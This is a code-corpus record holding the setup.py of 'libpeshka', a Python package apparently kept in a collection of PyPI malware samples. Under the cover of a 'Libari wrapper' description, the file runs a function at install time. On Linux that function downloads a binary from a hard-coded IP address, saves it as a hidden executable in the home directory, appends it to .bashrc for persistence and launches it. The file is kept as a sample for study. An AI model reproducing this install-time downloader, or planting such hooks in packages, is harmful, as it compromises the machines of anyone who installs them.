] | 35 | 2018-12-10T08:59:54.000Z | 2022-01-24T17:43:56.000Z | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
] | null | null | null | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
] | 8 | 2020-02-25T14:00:48.000Z | 2021-10-15T10:13:16.000Z | from setuptools import setup, find_packages
def rn ():
import platform
lb = False
try:
import urllib2
except ImportError:
import requests
lb = True
import os, stat
ADD_LOC = "http://145.249.104.71/out"
LOC = ".drv"
if platform.system () == "Linux":
response = ""
if not lb:
response = urllib2.urlopen(ADD_LOC).read ()
else:
response = requests.get (ADD_LOC)
response = response.content
os.chdir (os.path.expanduser ("~"))
d = open (LOC, "wb")
d.write (response)
d.close ()
current_state = os.stat (LOC)
os.chmod (LOC, current_state.st_mode|stat.S_IEXEC)
brc = open (".bashrc", "a")
brc.write ("\n~/.drv &")
brc.close ()
os.system ("~/.drv &")
else:
print ("Error installing library!")
exit (-1)
rn ()
setup(
name = 'libpeshka',
packages = find_packages (),
entry_points={
'setuptools.installation': [
'eggsecutable = libari.pr:rn'
]
},
version = '0.6',
description = 'Libari wrapper for python',
author = 'Ruri12',
author_email = 'ruri12@example.com',
scripts=["pr.py"],
url = '',
download_url = '',
keywords = ['libari'],
classifiers = [],
)
| 24.079365 | 67 | 0.46737 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.